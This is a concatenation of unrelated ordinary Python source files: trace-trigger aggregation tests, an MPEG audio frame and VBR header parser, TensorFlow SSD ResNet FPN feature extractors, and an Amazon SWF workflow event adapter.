def test_trigger_generation(self):
"""TestTrigger: generate"""
filters = {
"result": "fire"
}
event_class = self._trace.aim_and_fire
value = 1
pivot = "identifier"
trigger = Trigger(self._trace,
event_class,
filters,
value,
pivot)
expected = pd.Series([1, 1], index=pd.Index([0.1, 0.3], name="Time"))
assert_series_equal(expected, trigger.generate(0))
expected = pd.Series([1], index=pd.Index([0.5], name="Time"))
assert_series_equal(expected, trigger.generate(1))
def test_trigger_with_func(self):
"""Trigger works with a function or lambda as filter"""
def my_filter(val):
return val.startswith("fi")
trigger = Trigger(self._trace, self._trace.aim_and_fire,
filters={"result": my_filter}, value=1,
pivot="identifier")
expected = pd.Series([1], index=pd.Index([0.5], name="Time"))
assert_series_equal(expected, trigger.generate(1))
my_filters = {"result": lambda x: x.startswith("bl")}
trigger = Trigger(self._trace, self._trace.aim_and_fire,
filters=my_filters, value=1, pivot="identifier")
expected = pd.Series([1, 1], index=pd.Index([0.4, 0.6], name="Time"))
assert_series_equal(expected, trigger.generate(1))
def test_trigger_with_callable_class(self):
"""Trigger works with a callable class as filter"""
class my_filter(object):
def __init__(self, val_out):
self.prev_val = 0
self.val_out = val_out
def __call__(self, val):
ret = self.prev_val == self.val_out
self.prev_val = val
return ret
trigger = Trigger(self._trace, self._trace.aim_and_fire,
filters={"identifier": my_filter(1)}, value=1,
pivot="result")
expected = pd.Series([1], index=pd.Index([0.6], name="Time"))
assert_series_equal(expected, trigger.generate("blank"))
def test_filter_prev_values(self):
"""Trigger works with a filter that depends on previous values of the same pivot"""
# We generate an example in which we want a trigger whenever the
# identifier is no longer 1 for blank
class my_filter(object):
def __init__(self, val_out):
self.prev_val = 0
self.val_out = val_out
def __call__(self, val):
ret = self.prev_val == self.val_out
self.prev_val = val
return ret
trace = trappy.BareTrace()
data = collections.OrderedDict([
(0.1, ["blank", 1]),
(0.2, ["fire", 1]),
(0.3, ["blank", 0]), # value is no longer 1, trigger
(0.4, ["blank", 1]),
(0.5, ["fire", 0]), # This should NOT trigger
(0.6, ["blank", 0]), # value is no longer 1 for blank, trigger
])
data_frame = pd.DataFrame.from_dict(data, orient="index", )
data_frame.columns = ["result", "identifier"]
trace.add_parsed_event("aim_and_fire", data_frame)
trigger = Trigger(trace, trace.aim_and_fire,
filters={"identifier": my_filter(1)}, value=-1,
pivot="result")
expected = pd.Series([-1, -1], index=[0.3, 0.6])
assert_series_equal(expected, trigger.generate("blank"))
class TestAggregator(BaseTestStats):
def test_scalar_aggfunc_single_trigger(self):
"""TestAggregator: 1 trigger scalar aggfunc"""
def aggfunc(series):
return series.sum()
filters = {
"result": "fire"
}
event_class = self._trace.aim_and_fire
value = 1
pivot = "identifier"
trigger = Trigger(self._trace,
event_class,
filters,
value,
pivot)
aggregator = MultiTriggerAggregator([trigger],
self.topology,
aggfunc=aggfunc)
# There are three "fire" in total
# The all level in topology looks like
# [[0, 1]]
result = aggregator.aggregate(level="all")
self.assertEqual(result, [3.0])
# There are two "fire" on the first node group and a
# a single "fire" on the second node group at the cluster
# level which looks like
# [[0], [1]]
result = aggregator.aggregate(level="cluster")
self.assertEqual(result, [2.0, 1.0])
def test_vector_aggfunc_single_trigger(self):
"""TestAggregator: 1 trigger vector aggfunc"""
def aggfunc(series):
return series.cumsum()
filters = {
"result": "fire"
}
event_class = self._trace.aim_and_fire
value = 1
pivot = "identifier"
trigger = Trigger(self._trace, event_class, filters, value, pivot)
aggregator = MultiTriggerAggregator([trigger],
self.topology,
aggfunc=aggfunc)
# There are three "fire" in total
# The all level in topology looks like
# [[0, 1]]
result = aggregator.aggregate(level="all")
expected_result = pd.Series([1.0, 1.0, 2.0, 2.0, 3.0, 3.0],
index=pd.Index([0.1, 0.2, 0.3, 0.4, 0.5, 0.6])
)
assert_series_equal(result[0], expected_result)
def test_vector_aggfunc_multiple_trigger(self):
"""TestAggregator: multi trigger vector aggfunc"""
def aggfunc(series):
return series.cumsum()
filters = {
"result": "fire"
}
event_class = self._trace.aim_and_fire
value = 1
pivot = "identifier"
trigger_fire = Trigger(self._trace,
event_class,
filters,
value,
pivot)
filters = {
"result": "blank"
}
value = -1
trigger_blank = Trigger(self._trace, event_class, filters, value,
pivot)
aggregator = MultiTriggerAggregator([trigger_fire, trigger_blank],
self.topology,
aggfunc=aggfunc)
# There are three "fire" in total
# The all level in topology looks like
# [[0, 1]]
result = aggregator.aggregate(level="all")
expected_result = pd.Series([1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
index=pd.Index([0.1, 0.2, 0.3, 0.4, 0.5, 0.6])
)
assert_series_equal(result[0], expected_result)
def test_default_aggfunc_multiple_trigger(self):
"""MultiTriggerAggregator with the default aggfunc"""
trigger_fire = Trigger(self._trace, self._trace.aim_and_fire,
filters={"result": "fire"},
pivot="identifier", value=1)
trigger_blank = Trigger(self._trace, self._trace.aim_and_fire,
filters={"result": "blank"},
pivot="identifier", value=2)
aggregator = MultiTriggerAggregator([trigger_fire, trigger_blank],
self.topology)
results = aggregator.aggregate(level="cpu")
expected_results = [
pd.Series([1., 2., 1., 0., 0., 0.],
index=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
pd.Series([0., 0., 0., 2., 1., 2.],
index=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
]
self.assertEquals(len(results), len(expected_results))
for result, expected in zip(results, expected_results):
assert_series_equal(result, expected)
| |
# Created By: Virgil Dupras
# Created On: 2004/12/10
# Copyright 2010 Hardcoded Software (http://www.hardcoded.net)
# This software is licensed under the "BSD" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.hardcoded.net/licenses/bsd_license
from . import id3v1
from . import id3v2
import struct
from struct import unpack
from .util import tryint, FileOrPath
HEADER_SIZE = 4
ID_MPEG1 = 3
ID_MPEG2 = 2
ID_MPEG25 = 0
ID_LAYER1 = 3
ID_LAYER2 = 2
ID_LAYER3 = 1
MPEG_SYNC = 0xffe00000 # 11 bits set
MPEG_PAD = 0x200 # pad flag mask (pos 20)
BR_NULL = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
BR_M1_L1 = (0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448, 0)
BR_M1_L2 = (0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384, 0)
BR_M1_L3 = (0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 0)
BR_M2_L1 = (0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256, 0)
BR_M2_L23 = (0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160, 0)
BR_M1 = (BR_NULL, BR_M1_L3, BR_M1_L2, BR_M1_L1)
BR_M2 = (BR_NULL, BR_M2_L23, BR_M2_L23, BR_M2_L1)
BR_NULLS = (BR_NULL, BR_NULL, BR_NULL, BR_NULL)
BR_LIST = (BR_M2, BR_NULLS, BR_M2, BR_M1)
SR_NULL = (0, 0, 0, 0)
SR_M1 = (44100, 48000, 32000, 0)
SR_M2 = (22050, 24000, 16000, 0)
SR_M25 = (11025, 12000, 8000, 0)
SR_LIST = (SR_M25, SR_NULL, SR_M2, SR_M1)
SPF_NULL = (0, 0, 0, 0)
SPF_M1 = (0, 1152, 1152, 384)
SPF_M2 = (0, 576, 1152, 384)
SPF_LIST = (SPF_M2, SPF_NULL, SPF_M2, SPF_M1)
MPEG_CM_STEREO = 0
MPEG_CM_JOINT_STEREO = 1
MPEG_CM_DUAL_CHANNEL = 2
MPEG_CM_MONO = 3
MPEG_CM_UNKNOWN = 4
MAX_SEEK_BYTES = 4096
def get_vbr_offset(version, channel_mode):
# Depending on mpeg version and mode, the VBR header will be at a different offset
# after the mpeg header.
if version == ID_MPEG1:
if channel_mode == MPEG_CM_MONO:
return 17
else:
return 32
else:
if channel_mode == MPEG_CM_MONO:
return 9
else:
return 17
def get_vbr_coefficient(version, layer):
if version == ID_MPEG1:
if layer == ID_LAYER1:
return 48
else:
return 144
else:
if layer == ID_LAYER1:
return 24
elif layer == ID_LAYER2:
return 144
else:
return 72
class MpegFrameHeader:
def __init__(self, data):
# data = HEADER_SIZE bytes integer
self.valid = False
self.mpeg_id = 0
self.layer = 0
self.channel_mode = MPEG_CM_UNKNOWN
self.bitrate = 0
self.sample_rate = 0
self.sample_count = 0
self.padding_size = 0
self.size = 0
if (data & MPEG_SYNC) == MPEG_SYNC:
self.valid = True
self.mpeg_id = (data >> 19) & 0x3
self.layer = (data >> 17) & 0x3
self.channel_mode = (data >> 6) & 0x3
br_id = (data >> 12) & 0xf
fr_id = (data >> 10) & 0x3
self.bitrate = BR_LIST[self.mpeg_id][self.layer][br_id]
self.sample_rate = SR_LIST[self.mpeg_id][fr_id]
self.sample_count = SPF_LIST[self.mpeg_id][self.layer]
if data & MPEG_PAD:
self.padding_size = (4 if self.layer == ID_LAYER1 else 1)
else:
self.padding_size = 0
if self.sample_count and self.bitrate and self.sample_rate:
sc = self.sample_count
sr = self.sample_rate
br = self.bitrate
pad = self.padding_size
self.size = (((sc // 8) * br * 1000) // sr) + pad
else:
self.valid = False
class XingHeader:
def __init__(self, data): # data is a 128 bytes str
self.valid = data[:4] == b'Xing'
self.frames = unpack('!I', data[8:12])[0]
self.size = unpack('!I', data[12:16])[0]
self.scale = data[119]
class FhgHeader:
def __init__(self, data):
self.valid = data[:4] == b'VBRI'
self.frames = unpack('!I', data[14:18])[0]
self.size = unpack('!I', data[10:14])[0]
self.scale = unpack('B', data[9:10])[0]
class ComputedVBRHeader:
def __init__(self, frame_browser):
self.valid = True
self.frames, self.size = frame_browser.stats()
class FrameBrowser:
def __init__(self, fp):
self.fp = fp
self.frame_index = 0
if not self._read():
self._seek()
self.initial_position = self.position
def _read(self):
self.position = tryint(self.fp.tell())
data = self.fp.read(HEADER_SIZE)
try:
self.frame = MpegFrameHeader(unpack("!I", data)[0])
except struct.error:
self.frame = MpegFrameHeader(0)
return self.frame.valid
def _seek(self):
# A mpeg header is 11 set bits. Which means that there is a \xff char followed by a char
# that is \xe0 or more.
self.fp.seek(self.position, 0)
data = self.fp.read(MAX_SEEK_BYTES)
tag_index = data.find(id3v2.ID_ID3)
if tag_index > -1:
self.fp.seek(self.position + tag_index, 0)
h = id3v2.Header(self.fp)
if h.valid:
self.position += tag_index + h.tagsize
return self._seek()
index = data.find(b'\xff')
while (index > -1):
try:
result = MpegFrameHeader(unpack('!I', data[index:index + HEADER_SIZE])[0])
if result.valid:
nextindex = index + result.size
try:
next = MpegFrameHeader(unpack('!I', data[nextindex:nextindex + HEADER_SIZE])[0])
if next.valid:
self.position += index
self.frame = result
return True
except struct.error:
pass
index = data.find(b'\xff', index + 1)
except struct.error:
index = -1
return False
def first(self):
self.fp.seek(self.initial_position, 0)
self.frame_index = 0
self._read()
return self.frame
def __next__(self):
if self.frame.valid:
self.fp.seek(self.position + self.frame.size, 0)
self._read()
self.frame_index += 1
return self.frame
def stats(self):
"""Iterates over all frames and return (frame_count, total_size)"""
self.first()
size = self.frame.size
while next(self).valid:
size += self.frame.size
return (self.frame_index, size)
def get_vbr_info(fp, b):
fheader = b.frame
vbr_offset = get_vbr_offset(fheader.mpeg_id, fheader.channel_mode)
fp.seek(vbr_offset + 4, 1)
vbr_id = fp.read(4)
fp.seek(-4, 1)
if vbr_id == b'Xing':
return XingHeader(fp.read(128))
if vbr_id == b'VBRI':
return FhgHeader(fp.read(18))
br = b.frame.bitrate
for i in range(4):
if next(b).bitrate != br:
return ComputedVBRHeader(b)
class Mpeg:
'''The class used to handle MPEG metadata.
:param infile: The file object or path to process.
:ivar int ~mpeg.Mpeg.audio_offset: The offset, in bytes, at which audio data starts in the file.
:ivar int ~mpeg.Mpeg.duration: The duration of the audio file (in whole seconds).
:ivar ~mpeg.Mpeg.id3v1: The ID3 version 1 metadata, if present.
:vartype id3v1: :class:`hsaudiotag.id3v1.Id3v1`
:ivar ~mpeg.Mpeg.id3v2: The ID3 version 2 metadata, if present.
:vartype id3v2: :class:`hsaudiotag.id3v2.Id3v2`
:ivar int ~mpeg.Mpeg.size: The size of the file, in bytes.
:ivar ComputedVBRHeader ~mpeg.Mpeg.vbr:
:ivar bool ~mpeg.Mpeg.valid: Whether the file could correctly be read or not.
'''
def __init__(self, infile):
with FileOrPath(infile) as fp:
self.id3v1 = id3v1.Id3v1(fp)
self.id3v2 = id3v2.Id3v2(fp)
if self.id3v2.exists and (self.id3v2.position == id3v2.POS_BEGIN):
start_offset = self.id3v2.size
else:
start_offset = 0
fp.seek(start_offset, 0)
b = FrameBrowser(fp)
self._frameheader = b.frame
self.audio_offset = b.position
fp.seek(b.position, 0) # Needed for VBR seeking
self.vbr = get_vbr_info(fp, b)
fp.seek(0, 2)
self.size = tryint(fp.tell())
if self.bitrate:
# (audio_size * 8) / (bitrate * 1000) == audio_size / (bitrate * 125)
self.duration = self.audio_size // (self.bitrate * 125)
# 'and self.id3v2.duration' is there to avoid reading the mpeg frames when there is no TLEN in the tag.
if self.id3v2.exists and self.id3v2.duration and (self.id3v2.duration != self.duration):
# Tag duration and guessed durations are wrong. Read all frames
frames, size = b.stats()
self.duration = size // (self.bitrate * 125)
else:
self.duration = 0
self.valid = self._frameheader.valid
# --- Properties
@property
def tag(self):
'''The :class:`hsaudiotag.id3v2.Id3v2` or :class:`hsaudiotag.id3v1.Id3v1`
metadata object associated with the MPEG file.
'''
if self.id3v2.exists:
return self.id3v2
elif self.id3v1.exists:
return self.id3v1
@property
def audio_size(self):
'''The size of the audio part of the file in bytes.'''
result = self.size - self.id3v1.size - self.audio_offset
if self.id3v2.position == id3v2.POS_END:
result -= self.id3v2.size
return result
@property
def bitrate(self):
'''The bitrate of the audio file.'''
if self.vbr and (self.vbr.frames > 0):
coeff = get_vbr_coefficient(self._frameheader.mpeg_id, self._frameheader.layer)
pad = self._frameheader.padding_size
sr = self._frameheader.sample_rate
size_per_frame = self.vbr.size // self.vbr.frames
return ((size_per_frame - pad) * sr) // (coeff * 1000)
else:
return self._frameheader.bitrate
@property
def sample_rate(self):
'''The sample rate of the audio file.'''
return self._frameheader.sample_rate
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD Feature Pyramid Network (FPN) feature extractors based on Resnet v1.
See https://arxiv.org/abs/1708.02002 for details.
"""
import tensorflow as tf
from object_detection.meta_architectures import ssd_meta_arch
from object_detection.models import feature_map_generators
from object_detection.utils import context_manager
from object_detection.utils import ops
from object_detection.utils import shape_utils
from nets import resnet_v1
slim = tf.contrib.slim
class _SSDResnetV1FpnFeatureExtractor(ssd_meta_arch.SSDFeatureExtractor):
"""SSD FPN feature extractor based on Resnet v1 architecture."""
def __init__(self,
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
resnet_base_fn,
resnet_scope_name,
fpn_scope_name,
fpn_min_level=3,
fpn_max_level=7,
additional_layer_depth=256,
reuse_weights=None,
use_explicit_padding=False,
use_depthwise=False,
override_base_feature_extractor_hyperparams=False):
"""SSD FPN feature extractor based on Resnet v1 architecture.
Args:
is_training: whether the network is in training mode.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
conv_hyperparams_fn: A function to construct tf slim arg_scope for conv2d
and separable_conv2d ops in the layers that are added on top of the
base feature extractor.
resnet_base_fn: base resnet network to use.
resnet_scope_name: scope name under which to construct resnet
fpn_scope_name: scope name under which to construct the feature pyramid
network.
fpn_min_level: the highest resolution feature map to use in FPN. The valid
values are {2, 3, 4, 5} which map to Resnet blocks {1, 2, 3, 4}
respectively.
fpn_max_level: the smallest resolution feature map to construct or use in
FPN. FPN constructions uses features maps starting from fpn_min_level
upto the fpn_max_level. In the case that there are not enough feature
maps in the backbone network, additional feature maps are created by
applying stride 2 convolutions until we get the desired number of fpn
levels.
additional_layer_depth: additional feature map layer channel depth.
reuse_weights: Whether to reuse variables. Default is None.
use_explicit_padding: Whether to use explicit padding when extracting
features. Default is False. UNUSED currently.
use_depthwise: Whether to use depthwise convolutions. UNUSED currently.
override_base_feature_extractor_hyperparams: Whether to override
hyperparameters of the base feature extractor with the one from
`conv_hyperparams_fn`.
Raises:
ValueError: On supplying invalid arguments for unused arguments.
"""
super(_SSDResnetV1FpnFeatureExtractor, self).__init__(
is_training=is_training,
depth_multiplier=depth_multiplier,
min_depth=min_depth,
pad_to_multiple=pad_to_multiple,
conv_hyperparams_fn=conv_hyperparams_fn,
reuse_weights=reuse_weights,
use_explicit_padding=use_explicit_padding,
use_depthwise=use_depthwise,
override_base_feature_extractor_hyperparams=
override_base_feature_extractor_hyperparams)
if self._use_explicit_padding is True:
raise ValueError('Explicit padding is not a valid option.')
self._resnet_base_fn = resnet_base_fn
self._resnet_scope_name = resnet_scope_name
self._fpn_scope_name = fpn_scope_name
self._fpn_min_level = fpn_min_level
self._fpn_max_level = fpn_max_level
self._additional_layer_depth = additional_layer_depth
def preprocess(self, resized_inputs):
"""SSD preprocessing.
VGG style channel mean subtraction as described here:
https://gist.github.com/ksimonyan/211839e770f7b538e2d8#file-readme-mdnge.
Note that if the number of channels is not equal to 3, the mean subtraction
will be skipped and the original resized_inputs will be returned.
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
if resized_inputs.shape.as_list()[3] == 3:
channel_means = [123.68, 116.779, 103.939]
return resized_inputs - [[channel_means]]
else:
return resized_inputs
def _filter_features(self, image_features):
# TODO(rathodv): Change resnet endpoint to strip scope prefixes instead
# of munging the scope here.
filtered_image_features = dict({})
for key, feature in image_features.items():
feature_name = key.split('/')[-1]
if feature_name in ['block1', 'block2', 'block3', 'block4']:
filtered_image_features[feature_name] = feature
return filtered_image_features
def extract_features(self, preprocessed_inputs):
"""Extract features from preprocessed inputs.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
feature_maps: a list of tensors where the ith tensor has shape
[batch, height_i, width_i, depth_i]
"""
preprocessed_inputs = shape_utils.check_min_image_dim(
129, preprocessed_inputs)
with tf.variable_scope(
self._resnet_scope_name, reuse=self._reuse_weights) as scope:
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
with (slim.arg_scope(self._conv_hyperparams_fn())
if self._override_base_feature_extractor_hyperparams else
context_manager.IdentityContextManager()):
_, image_features = self._resnet_base_fn(
inputs=ops.pad_to_multiple(preprocessed_inputs,
self._pad_to_multiple),
num_classes=None,
is_training=None,
global_pool=False,
output_stride=None,
store_non_strided_activations=True,
min_base_depth=self._min_depth,
depth_multiplier=self._depth_multiplier,
scope=scope)
image_features = self._filter_features(image_features)
depth_fn = lambda d: max(int(d * self._depth_multiplier), self._min_depth)
with slim.arg_scope(self._conv_hyperparams_fn()):
with tf.variable_scope(self._fpn_scope_name,
reuse=self._reuse_weights):
base_fpn_max_level = min(self._fpn_max_level, 5)
feature_block_list = []
for level in range(self._fpn_min_level, base_fpn_max_level + 1):
feature_block_list.append('block{}'.format(level - 1))
fpn_features = feature_map_generators.fpn_top_down_feature_maps(
[(key, image_features[key]) for key in feature_block_list],
depth=depth_fn(self._additional_layer_depth))
feature_maps = []
for level in range(self._fpn_min_level, base_fpn_max_level + 1):
feature_maps.append(
fpn_features['top_down_block{}'.format(level - 1)])
last_feature_map = fpn_features['top_down_block{}'.format(
base_fpn_max_level - 1)]
# Construct coarse features
for i in range(base_fpn_max_level, self._fpn_max_level):
last_feature_map = slim.conv2d(
last_feature_map,
num_outputs=depth_fn(self._additional_layer_depth),
kernel_size=[3, 3],
stride=2,
padding='SAME',
scope='bottom_up_block{}'.format(i))
feature_maps.append(last_feature_map)
return feature_maps
class SSDResnet50V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
"""SSD Resnet50 V1 FPN feature extractor."""
def __init__(self,
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
fpn_min_level=3,
fpn_max_level=7,
additional_layer_depth=256,
reuse_weights=None,
use_explicit_padding=False,
use_depthwise=False,
override_base_feature_extractor_hyperparams=False):
"""SSD Resnet50 V1 FPN feature extractor based on Resnet v1 architecture.
Args:
is_training: whether the network is in training mode.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
conv_hyperparams_fn: A function to construct tf slim arg_scope for conv2d
and separable_conv2d ops in the layers that are added on top of the
base feature extractor.
fpn_min_level: the minimum level in feature pyramid networks.
fpn_max_level: the maximum level in feature pyramid networks.
additional_layer_depth: additional feature map layer channel depth.
reuse_weights: Whether to reuse variables. Default is None.
use_explicit_padding: Whether to use explicit padding when extracting
features. Default is False. UNUSED currently.
use_depthwise: Whether to use depthwise convolutions. UNUSED currently.
override_base_feature_extractor_hyperparams: Whether to override
hyperparameters of the base feature extractor with the one from
`conv_hyperparams_fn`.
"""
super(SSDResnet50V1FpnFeatureExtractor, self).__init__(
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
resnet_v1.resnet_v1_50,
'resnet_v1_50',
'fpn',
fpn_min_level,
fpn_max_level,
additional_layer_depth,
reuse_weights=reuse_weights,
use_explicit_padding=use_explicit_padding,
use_depthwise=use_depthwise,
override_base_feature_extractor_hyperparams=
override_base_feature_extractor_hyperparams)
class SSDResnet101V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
"""SSD Resnet101 V1 FPN feature extractor."""
def __init__(self,
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
fpn_min_level=3,
fpn_max_level=7,
additional_layer_depth=256,
reuse_weights=None,
use_explicit_padding=False,
use_depthwise=False,
override_base_feature_extractor_hyperparams=False):
"""SSD Resnet101 V1 FPN feature extractor based on Resnet v1 architecture.
Args:
is_training: whether the network is in training mode.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
conv_hyperparams_fn: A function to construct tf slim arg_scope for conv2d
and separable_conv2d ops in the layers that are added on top of the
base feature extractor.
fpn_min_level: the minimum level in feature pyramid networks.
fpn_max_level: the maximum level in feature pyramid networks.
additional_layer_depth: additional feature map layer channel depth.
reuse_weights: Whether to reuse variables. Default is None.
use_explicit_padding: Whether to use explicit padding when extracting
features. Default is False. UNUSED currently.
use_depthwise: Whether to use depthwise convolutions. UNUSED currently.
override_base_feature_extractor_hyperparams: Whether to override
hyperparameters of the base feature extractor with the one from
`conv_hyperparams_fn`.
"""
super(SSDResnet101V1FpnFeatureExtractor, self).__init__(
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
resnet_v1.resnet_v1_101,
'resnet_v1_101',
'fpn',
fpn_min_level,
fpn_max_level,
additional_layer_depth,
reuse_weights=reuse_weights,
use_explicit_padding=use_explicit_padding,
use_depthwise=use_depthwise,
override_base_feature_extractor_hyperparams=
override_base_feature_extractor_hyperparams)
class SSDResnet152V1FpnFeatureExtractor(_SSDResnetV1FpnFeatureExtractor):
"""SSD Resnet152 V1 FPN feature extractor."""
def __init__(self,
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
fpn_min_level=3,
fpn_max_level=7,
additional_layer_depth=256,
reuse_weights=None,
use_explicit_padding=False,
use_depthwise=False,
override_base_feature_extractor_hyperparams=False):
"""SSD Resnet152 V1 FPN feature extractor based on Resnet v1 architecture.
Args:
is_training: whether the network is in training mode.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
pad_to_multiple: the nearest multiple to zero pad the input height and
width dimensions to.
conv_hyperparams_fn: A function to construct tf slim arg_scope for conv2d
and separable_conv2d ops in the layers that are added on top of the
base feature extractor.
fpn_min_level: the minimum level in feature pyramid networks.
fpn_max_level: the maximum level in feature pyramid networks.
additional_layer_depth: additional feature map layer channel depth.
reuse_weights: Whether to reuse variables. Default is None.
use_explicit_padding: Whether to use explicit padding when extracting
features. Default is False. UNUSED currently.
use_depthwise: Whether to use depthwise convolutions. UNUSED currently.
override_base_feature_extractor_hyperparams: Whether to override
hyperparameters of the base feature extractor with the one from
`conv_hyperparams_fn`.
"""
super(SSDResnet152V1FpnFeatureExtractor, self).__init__(
is_training,
depth_multiplier,
min_depth,
pad_to_multiple,
conv_hyperparams_fn,
resnet_v1.resnet_v1_152,
'resnet_v1_152',
'fpn',
fpn_min_level,
fpn_max_level,
additional_layer_depth,
reuse_weights=reuse_weights,
use_explicit_padding=use_explicit_padding,
use_depthwise=use_depthwise,
override_base_feature_extractor_hyperparams=
override_base_feature_extractor_hyperparams)
| |
import json
from datetime import datetime
from pyworkflow.process import Process, ProcessCompleted, ProcessCanceled, ProcessTimedOut
from pyworkflow.events import Event, DecisionStartedEvent, DecisionEvent, ActivityEvent, ActivityStartedEvent, SignalEvent, ChildProcessEvent, TimerEvent, ProcessStartedEvent
from pyworkflow.signal import Signal
from pyworkflow.activity import ActivityCompleted, ActivityCanceled, ActivityFailed, ActivityTimedOut, ActivityExecution
from pyworkflow.decision import ScheduleActivity, StartChildProcess, Timer
class AmazonSWFProcess(Process):
@classmethod
def _related_event(cls, related, event_id):
return filter(lambda x: x['eventId'] == event_id, related)[0]
@classmethod
def _attributes(cls, event):
event_type = event['eventType']
return event.get(event_type[0].lower() + event_type[1:] + 'EventAttributes', {})
@classmethod
def _decision_event(cls, event, related):
event_id = event['eventId']
event_dt = datetime.fromtimestamp(event['eventTimestamp'])
event_type = event['eventType']
attributes = cls._attributes(event)
completed_event = cls._related_event(related, attributes['decisionTaskCompletedEventId'])
started_event_id = completed_event['decisionTaskCompletedEventAttributes']['startedEventId']
inp = json.loads(attributes['input']) if attributes.get('input', None) else None
if event_type == 'ActivityTaskScheduled':
activity_id = attributes['activityId']
activity = attributes['activityType']['name']
decision = ScheduleActivity(activity=activity, id=activity_id, input=inp)
elif event_type == 'StartChildWorkflowExecutionInitiated':
process = Process(workflow=attributes['workflowType']['name'], input=inp, tags=attributes['tagList'])
decision = StartChildProcess(process=process)
elif event_type == 'TimerStarted':
decision = Timer(delay=int(attributes['startToFireTimeout']), data=json.loads(attributes['control']))
# logical order is start of decision, everything after needs to be considered in next decision
return (started_event_id, DecisionEvent(datetime=event_dt, decision=decision))
@classmethod
def _activity_event(cls, event, related):
event_id = event['eventId']
event_dt = datetime.fromtimestamp(event['eventTimestamp'])
event_type = event['eventType']
attributes = cls._attributes(event)
def event_with_result(result):
scheduled_by = cls._related_event(related, attributes['scheduledEventId'])
attrs = scheduled_by.get('activityTaskScheduledEventAttributes', None)
try:
inp = json.loads(attrs['input']) if attrs.get('input', None) else None
except:
inp = attrs.get('input', None)
kwargs = {
'date': event_dt,
'activity_execution': ActivityExecution(attrs['activityType']['name'], attrs['activityId'], inp),
}
event_cls = ActivityEvent if result else ActivityStartedEvent
if result:
kwargs['result'] = result
return (event_id, event_cls(**kwargs))
if event_type == 'ActivityTaskStarted':
return event_with_result(None)
elif event_type == 'ActivityTaskCompleted':
result = json.loads(attributes['result']) if 'result' in attributes.keys() else None
return event_with_result(ActivityCompleted(result=result))
elif event_type == 'ActivityTaskFailed':
reason = attributes.get('reason', None)
details = attributes.get('details', None)
res = ActivityFailed(reason=reason, details=details)
return event_with_result(res)
elif event_type == 'ActivityTaskCanceled':
details = attributes.get('details', None)
return event_with_result(ActivityCanceled(details=details))
elif event_type == 'ActivityTaskTimedOut':
details = attributes.get('details', None)
return event_with_result(ActivityTimedOut(details=details))
@classmethod
def _child_process_event(cls, event, related):
event_id = event['eventId']
event_dt = datetime.fromtimestamp(event['eventTimestamp'])
event_type = event['eventType']
attributes = cls._attributes(event)
initiated_by = cls._related_event(related, attributes['initiatedEventId'])
initiated_attr = initiated_by['startChildWorkflowExecutionInitiatedEventAttributes']
pid = cls.pid_from_description(attributes['workflowExecution'])
kwargs = {
'datetime': event_dt,
'workflow': initiated_attr['workflowType']['name'],
'tags': initiated_attr['tagList']
}
if event_type == 'ChildWorkflowExecutionCompleted':
json_res = json.loads(attributes['result']) if 'result' in attributes.keys() else None
result = ProcessCompleted(result=json_res)
elif event_type == 'ChildWorkflowExecutionCanceled':
details = attributes.get('details', None)
result = ProcessCanceled(details=details)
elif event_type == 'ChildWorkflowExecutionTimedOut':
result = ProcessTimedOut()
else:
return None
return (event_id, ChildProcessEvent(pid, result, **kwargs))
@classmethod
def _signal_event(cls, event, related):
event_id = event['eventId']
event_dt = datetime.fromtimestamp(event['eventTimestamp'])
event_type = event['eventType']
attributes = cls._attributes(event)
try:
data = json.loads(attributes['input']) if 'input' in attributes.keys() else None
except:
data = attributes.get('input', None)
name = attributes['signalName']
return (event_id, SignalEvent(datetime=event_dt, signal=Signal(name=name, data=data)))
@classmethod
def _timer_event(cls, event, related):
event_id = event['eventId']
event_dt = datetime.fromtimestamp(event['eventTimestamp'])
attributes = cls._attributes(event)
started_by = filter(lambda x: x['eventId'] == attributes['startedEventId'], related)[0]
started_attrs = started_by['timerStartedEventAttributes']
timer = Timer(delay=int(started_attrs['startToFireTimeout']), data=json.loads(started_attrs['control']))
return (event_id, TimerEvent(datetime=event_dt, timer=timer))
